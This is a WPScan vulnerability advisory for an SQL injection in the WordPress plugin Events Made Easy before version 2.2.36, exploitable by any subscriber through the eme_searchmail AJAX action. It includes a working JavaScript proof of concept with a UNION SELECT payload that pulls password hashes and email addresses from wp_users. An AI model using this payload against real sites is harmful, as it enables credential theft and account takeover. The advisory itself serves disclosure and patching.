Lucene search

K
wpvulndbKrzysztof ZającWPVDB-ID:BC7058B1-CA93-4C45-9CED-7848C7AE4150
HistoryDec 06, 2021 - 12:00 a.m.

Events Made Easy < 2.2.36 - Subscriber+ SQL Injection

2021-12-0600:00:00
Krzysztof Zając
wpscan.com
5

0.001 Low

EPSS

Percentile

37.9%

The plugin does not sanitise and escape the search_text parameter before using it in a SQL statement via the eme_searchmail AJAX action, available to any authenticated users. As a result, users with a role as low as subscriber can call it and perform SQL injection attacks

PoC

fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“eme_searchmail”,“search_text”: “') union select 1,1,1,1,1,user_pass,user_email,1,1,1,1,1,1,1,1,1,1,1,1 from wp_users – g”}), “method”: “POST”, “credentials”: “include” }) .then(response => response.text()) .then(data => console.log(data));

CPENameOperatorVersion
events-made-easylt2.2.36

0.001 Low

EPSS

Percentile

37.9%

Related for WPVDB-ID:BC7058B1-CA93-4C45-9CED-7848C7AE4150